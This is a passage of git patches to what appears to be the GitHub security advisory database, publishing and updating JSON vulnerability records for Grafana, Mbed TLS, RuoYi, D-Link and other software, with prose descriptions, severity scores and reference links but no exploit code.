"events": [ + { + "introduced": "0" + }, + { + "fixed": "1.9.2-0.20250521205822-0ba0b99665a9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6023" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/0ba0b99665a946cd96676ef85ec8bc83028cb1d7" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/40ed88fe86d347bcde5ddaed6c4a20a95d2f0d55" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/5b00e21638f565eed46acb4d0b7c009968df4c3b" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/b6dd2b70c655c61b111b328f1a7dcca6b3954936" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/e0ba4b480954f8a33aa2cff3229f6bcc05777bd9" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana" + }, + { + "type": "WEB", + "url": "https://grafana.com/blog/2025/07/17/grafana-security-release-medium-and-high-severity-fixes-for-cve-2025-6197-and-cve-2025-6023" + }, + { + "type": "WEB", + "url": "https://grafana.com/security/security-advisories/cve-2025-6023" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-20T16:35:49Z", + "nvd_published_at": "2025-07-18T08:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vqph-p5vc-g644/GHSA-vqph-p5vc-g644.json b/advisories/unreviewed/2025/07/GHSA-vqph-p5vc-g644/GHSA-vqph-p5vc-g644.json deleted file mode 100644 index 435af69e8779c..0000000000000 --- a/advisories/unreviewed/2025/07/GHSA-vqph-p5vc-g644/GHSA-vqph-p5vc-g644.json +++ /dev/null @@ -1,40 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-vqph-p5vc-g644", - "modified": "2025-07-18T09:30:31Z", - "published": "2025-07-18T09:30:31Z", - "aliases": [ - "CVE-2025-6023" - ], - "details": "An open redirect vulnerability has been identified in Grafana OSS that can be exploited to achieve XSS attacks. The vulnerability was introduced in Grafana v11.5.0.\n\nThe open redirect can be chained with path traversal vulnerabilities to achieve XSS.\n\nFixed in versions 12.0.2+security-01, 11.6.3+security-01, 11.5.6+security-01, 11.4.6+security-01 and 11.3.8+security-01", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6023" - }, - { - "type": "WEB", - "url": "https://grafana.com/blog/2025/07/17/grafana-security-release-medium-and-high-severity-fixes-for-cve-2025-6197-and-cve-2025-6023" - }, - { - "type": "WEB", - "url": "https://grafana.com/security/security-advisories/cve-2025-6023" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2025-07-18T08:15:28Z" - } -} \ No newline at end of file From fbf31e40239af7b72488ef5930f070c91b34e1dc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 20 Jul 2025 16:46:16 +0000 Subject: [PATCH 038/323] Publish GHSA-r7q6-6fmq-mx4c --- .../GHSA-r7q6-6fmq-mx4c.json | 31 ++++++++++++++++--- 1 file changed, 26 insertions(+), 5 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json (72%) diff --git a/advisories/unreviewed/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json b/advisories/github-reviewed/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json similarity index 72% rename from advisories/unreviewed/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json rename to advisories/github-reviewed/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json index 91d27e98c345c..9d2ab9ac2689a 100644 --- a/advisories/unreviewed/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json +++ b/advisories/github-reviewed/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-r7q6-6fmq-mx4c", - "modified": "2025-07-18T21:30:27Z", + "modified": "2025-07-20T16:44:46Z", "published": "2025-07-18T15:31:57Z", "aliases": [ "CVE-2025-46002" ], + "summary": "Filemanager is vulnerable to Relative Path Traversal through filemanager.php", "details": "An issue in Filemanager v2.5.0 and below allows attackers to execute a directory traversal via sending a crafted HTTP request to the filemanager.php endpoint.", "severity": [ { @@ -13,14 +14,34 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "simogeo/filemanager" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.5.0" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46002" }, { - "type": "WEB", + "type": "PACKAGE", "url": "https://github.com/simogeo/Filemanager" }, { @@ -61,8 +82,8 @@ "CWE-23" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-07-20T16:44:46Z", "nvd_published_at": "2025-07-18T14:15:24Z" } } \ No newline at end of file From 0ea86fcb0c7c5f5a513ca6b3e46d1b58411ee612 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 20 Jul 2025 18:32:02 +0000 Subject: [PATCH 039/323] Publish Advisories GHSA-54pj-89cm-m6fv GHSA-6pmc-2wx6-f9jj GHSA-6prx-g4fx-6j43 GHSA-qxjv-288g-w43x GHSA-r7mw-vcw7-q6mr GHSA-rfpq-8997-wr58 --- .../GHSA-54pj-89cm-m6fv.json | 52 +++++++++++++++++ .../GHSA-6pmc-2wx6-f9jj.json | 56 +++++++++++++++++++ .../GHSA-6prx-g4fx-6j43.json | 56 +++++++++++++++++++ .../GHSA-qxjv-288g-w43x.json | 40 +++++++++++++ .../GHSA-r7mw-vcw7-q6mr.json | 52 +++++++++++++++++ .../GHSA-rfpq-8997-wr58.json | 52 +++++++++++++++++ 6 files changed, 308 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-54pj-89cm-m6fv/GHSA-54pj-89cm-m6fv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6pmc-2wx6-f9jj/GHSA-6pmc-2wx6-f9jj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6prx-g4fx-6j43/GHSA-6prx-g4fx-6j43.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qxjv-288g-w43x/GHSA-qxjv-288g-w43x.json create mode 100644 advisories/unreviewed/2025/07/GHSA-r7mw-vcw7-q6mr/GHSA-r7mw-vcw7-q6mr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rfpq-8997-wr58/GHSA-rfpq-8997-wr58.json diff --git a/advisories/unreviewed/2025/07/GHSA-54pj-89cm-m6fv/GHSA-54pj-89cm-m6fv.json b/advisories/unreviewed/2025/07/GHSA-54pj-89cm-m6fv/GHSA-54pj-89cm-m6fv.json new file mode 100644 index 0000000000000..1d77fe91b87c8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-54pj-89cm-m6fv/GHSA-54pj-89cm-m6fv.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-54pj-89cm-m6fv", + "modified": "2025-07-20T18:30:20Z", + "published": "2025-07-20T18:30:20Z", + "aliases": [ + "CVE-2025-7898" + ], + "details": "A vulnerability was found in Codecanyon iDentSoft 2.0. It has been classified as critical. This affects an unknown part of the file /clinica/profile/updateSetting of the component Account Setting Page. The manipulation of the argument photo leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7898" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317013" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317013" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.609578" + }, + { + "type": "WEB", + "url": "https://www.youtube.com/watch?v=jsWOCSWs7gs" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T16:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6pmc-2wx6-f9jj/GHSA-6pmc-2wx6-f9jj.json b/advisories/unreviewed/2025/07/GHSA-6pmc-2wx6-f9jj/GHSA-6pmc-2wx6-f9jj.json new file mode 100644 index 0000000000000..e90a3c3e95376 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6pmc-2wx6-f9jj/GHSA-6pmc-2wx6-f9jj.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6pmc-2wx6-f9jj", + "modified": "2025-07-20T18:30:20Z", + "published": "2025-07-20T18:30:20Z", + "aliases": [ + "CVE-2025-7902" + ], + "details": "A vulnerability classified as problematic has been found in yangzongzhuan RuoYi up to 4.8.1. Affected is the function addSave of the file com/ruoyi/web/controller/system/SysNoticeController.java. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7902" + }, + { + "type": "WEB", + "url": "https://github.com/yangzongzhuan/RuoYi/issues/294" + }, + { + "type": "WEB", + "url": "https://github.com/yangzongzhuan/RuoYi/issues/294#issue-3211205807" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317016" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317016" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618354" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T16:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6prx-g4fx-6j43/GHSA-6prx-g4fx-6j43.json b/advisories/unreviewed/2025/07/GHSA-6prx-g4fx-6j43/GHSA-6prx-g4fx-6j43.json new file mode 100644 index 0000000000000..c22875056467c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6prx-g4fx-6j43/GHSA-6prx-g4fx-6j43.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6prx-g4fx-6j43", + "modified": "2025-07-20T18:30:21Z", + "published": "2025-07-20T18:30:21Z", + "aliases": [ + "CVE-2025-7904" + ], + "details": "A vulnerability, which was classified as critical, was found in itsourcecode Insurance Management System 1.0. This affects an unknown part of the file /insertNominee.php. The manipulation of the argument nominee_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7904" + }, + { + "type": "WEB", + "url": "https://github.com/viaiam/CVE/issues/1" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317019" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317019" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618358" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T17:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-qxjv-288g-w43x/GHSA-qxjv-288g-w43x.json b/advisories/unreviewed/2025/07/GHSA-qxjv-288g-w43x/GHSA-qxjv-288g-w43x.json new file mode 100644 index 0000000000000..0316443003154 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qxjv-288g-w43x/GHSA-qxjv-288g-w43x.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qxjv-288g-w43x", + "modified": "2025-07-20T18:30:21Z", + "published": "2025-07-20T18:30:21Z", + "aliases": [ + "CVE-2025-48965" + ], + "details": "Mbed TLS before 3.6.4 has a NULL pointer dereference because mbedtls_asn1_store_named_data can trigger conflicting data with val.p of NULL but val.len greater than zero.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48965" + }, + { + "type": "WEB", + "url": "https://github.com/Mbed-TLS/mbedtls-docs/blob/main/security-advisories/mbedtls-security-advisory-2025-06-6.md" + }, + { + "type": "WEB", + "url": "https://mbed-tls.readthedocs.io/en/latest/tech-updates/security-advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-696" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T18:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-r7mw-vcw7-q6mr/GHSA-r7mw-vcw7-q6mr.json b/advisories/unreviewed/2025/07/GHSA-r7mw-vcw7-q6mr/GHSA-r7mw-vcw7-q6mr.json new file mode 100644 index 0000000000000..b27b5ad1d30a5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-r7mw-vcw7-q6mr/GHSA-r7mw-vcw7-q6mr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r7mw-vcw7-q6mr", + "modified": "2025-07-20T18:30:21Z", + "published": "2025-07-20T18:30:20Z", + "aliases": [ + "CVE-2025-7903" + ], + "details": "A vulnerability classified as problematic was found in yangzongzhuan RuoYi up to 4.8.1. Affected by this vulnerability is an unknown functionality of the component Image Source Handler. The manipulation leads to improper restriction of rendered ui layers. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7903" + }, + { + "type": "WEB", + "url": "https://github.com/yangzongzhuan/RuoYi/issues/295" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317017" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317017" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618357" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1021" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T17:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rfpq-8997-wr58/GHSA-rfpq-8997-wr58.json b/advisories/unreviewed/2025/07/GHSA-rfpq-8997-wr58/GHSA-rfpq-8997-wr58.json new file mode 100644 index 0000000000000..419185a15c197 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rfpq-8997-wr58/GHSA-rfpq-8997-wr58.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfpq-8997-wr58", + "modified": "2025-07-20T18:30:20Z", + "published": "2025-07-20T18:30:20Z", + "aliases": [ + "CVE-2025-7901" + ], + "details": "A vulnerability was found in yangzongzhuan RuoYi up to 4.8.1. It has been rated as problematic. This issue affects some unknown processing of the file /swagger-ui/index.html of the component Swagger UI. The manipulation of the argument configUrl leads to cross site scripting. The attack may be initiated remotely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7901" + }, + { + "type": "WEB", + "url": "https://github.com/yangzongzhuan/RuoYi/issues/293" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317015" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317015" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618353" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T16:15:24Z" + } +} \ No newline at end of file From 9fc11da797ef81902dbf9e4cab78220000b9dc19 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 20 Jul 2025 21:32:36 +0000 Subject: [PATCH 040/323] Publish Advisories GHSA-5qwg-8m23-3p6h GHSA-7xcg-xp2h-m42v GHSA-fmjv-q9m9-j657 GHSA-ggpm-9q87-cq9w GHSA-j873-wcr3-6m2p GHSA-jvq4-qh39-564c GHSA-pq32-79qf-69q2 GHSA-r3pp-w9mm-8fcc GHSA-v2fm-69vv-qrc5 --- .../GHSA-5qwg-8m23-3p6h.json | 56 +++++++++++++++++++ .../GHSA-7xcg-xp2h-m42v.json | 40 +++++++++++++ .../GHSA-fmjv-q9m9-j657.json | 40 +++++++++++++ .../GHSA-ggpm-9q87-cq9w.json | 56 +++++++++++++++++++ .../GHSA-j873-wcr3-6m2p.json | 40 +++++++++++++ .../GHSA-jvq4-qh39-564c.json | 36 ++++++++++++ .../GHSA-pq32-79qf-69q2.json | 36 ++++++++++++ .../GHSA-r3pp-w9mm-8fcc.json | 52 +++++++++++++++++ .../GHSA-v2fm-69vv-qrc5.json | 52 +++++++++++++++++ 9 files changed, 408 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-5qwg-8m23-3p6h/GHSA-5qwg-8m23-3p6h.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7xcg-xp2h-m42v/GHSA-7xcg-xp2h-m42v.json create mode 100644 advisories/unreviewed/2025/07/GHSA-fmjv-q9m9-j657/GHSA-fmjv-q9m9-j657.json create mode 100644 advisories/unreviewed/2025/07/GHSA-ggpm-9q87-cq9w/GHSA-ggpm-9q87-cq9w.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j873-wcr3-6m2p/GHSA-j873-wcr3-6m2p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jvq4-qh39-564c/GHSA-jvq4-qh39-564c.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pq32-79qf-69q2/GHSA-pq32-79qf-69q2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-r3pp-w9mm-8fcc/GHSA-r3pp-w9mm-8fcc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v2fm-69vv-qrc5/GHSA-v2fm-69vv-qrc5.json diff --git a/advisories/unreviewed/2025/07/GHSA-5qwg-8m23-3p6h/GHSA-5qwg-8m23-3p6h.json b/advisories/unreviewed/2025/07/GHSA-5qwg-8m23-3p6h/GHSA-5qwg-8m23-3p6h.json new file mode 100644 index 0000000000000..6296911766436 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5qwg-8m23-3p6h/GHSA-5qwg-8m23-3p6h.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5qwg-8m23-3p6h", + "modified": "2025-07-20T21:31:17Z", + "published": "2025-07-20T21:31:17Z", + "aliases": [ + "CVE-2025-7905" + ], + "details": "A vulnerability has been found in itsourcecode Insurance Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /insertPayment.php. The manipulation of the argument recipt_no leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7905" + }, + { + "type": "WEB", + "url": "https://github.com/viaiam/CVE/issues/2" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317020" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317020" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618359" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T19:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7xcg-xp2h-m42v/GHSA-7xcg-xp2h-m42v.json b/advisories/unreviewed/2025/07/GHSA-7xcg-xp2h-m42v/GHSA-7xcg-xp2h-m42v.json new file mode 100644 index 0000000000000..ab1039da33405 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7xcg-xp2h-m42v/GHSA-7xcg-xp2h-m42v.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7xcg-xp2h-m42v", + "modified": "2025-07-20T21:31:17Z", + "published": "2025-07-20T21:31:17Z", + "aliases": [ + "CVE-2025-47917" + ], + "details": "Mbed TLS before 3.6.4 allows a use-after-free in certain situations of applications that are developed in accordance with the documentation. The function mbedtls_x509_string_to_names() takes a head argument that is documented as an output argument. The documentation does not suggest that the function will free that pointer; however, the function does call mbedtls_asn1_free_named_data_list() on that argument, which performs a deep free(). As a result, application code that uses this function (relying only on documented behavior) is likely to still hold pointers to the memory blocks that were freed, resulting in a high risk of use-after-free or double-free. In particular, the two sample programs x509/cert_write and x509/cert_req are affected (use-after-free if the san string contains more than one DN).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47917" + }, + { + "type": "WEB", + "url": "https://github.com/Mbed-TLS/mbedtls-docs/blob/main/security-advisories/mbedtls-security-advisory-2025-06-7.md" + }, + { + "type": "WEB", + "url": "https://mbed-tls.readthedocs.io/en/latest/tech-updates/security-advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T19:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-fmjv-q9m9-j657/GHSA-fmjv-q9m9-j657.json b/advisories/unreviewed/2025/07/GHSA-fmjv-q9m9-j657/GHSA-fmjv-q9m9-j657.json new file mode 100644 index 0000000000000..b5836b71188d2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-fmjv-q9m9-j657/GHSA-fmjv-q9m9-j657.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmjv-q9m9-j657", + "modified": "2025-07-20T21:31:17Z", + "published": "2025-07-20T21:31:17Z", + "aliases": [ + "CVE-2025-49087" + ], + "details": "In Mbed TLS 3.6.1 through 3.6.3 before 3.6.4, a timing discrepancy in block cipher padding removal allows an attacker to recover the plaintext when PKCS#7 padding mode is used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49087" + }, + { + "type": "WEB", + "url": "https://github.com/Mbed-TLS/mbedtls-docs/blob/main/security-advisories/mbedtls-security-advisory-2025-06-5.md" + }, + { + "type": "WEB", + "url": "https://mbed-tls.readthedocs.io/en/latest/tech-updates/security-advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-385" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T19:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-ggpm-9q87-cq9w/GHSA-ggpm-9q87-cq9w.json b/advisories/unreviewed/2025/07/GHSA-ggpm-9q87-cq9w/GHSA-ggpm-9q87-cq9w.json new file mode 100644 index 0000000000000..0bfc8267f1c0e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-ggpm-9q87-cq9w/GHSA-ggpm-9q87-cq9w.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ggpm-9q87-cq9w", + "modified": "2025-07-20T21:31:18Z", + "published": "2025-07-20T21:31:18Z", + "aliases": [ + "CVE-2025-7908" + ], + "details": "A vulnerability was found in D-Link DI-8100 1.0. It has been declared as critical. Affected by this vulnerability is the function sprintf of the file /ddns.asp?opt=add of the component jhttpd. The manipulation of the argument mx leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7908" + }, + { + "type": "WEB", + "url": "https://github.com/buobo/bo-s-CVE/blob/main/DI-8100/wp.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317023" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317023" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618582" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T21:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j873-wcr3-6m2p/GHSA-j873-wcr3-6m2p.json b/advisories/unreviewed/2025/07/GHSA-j873-wcr3-6m2p/GHSA-j873-wcr3-6m2p.json new file mode 100644 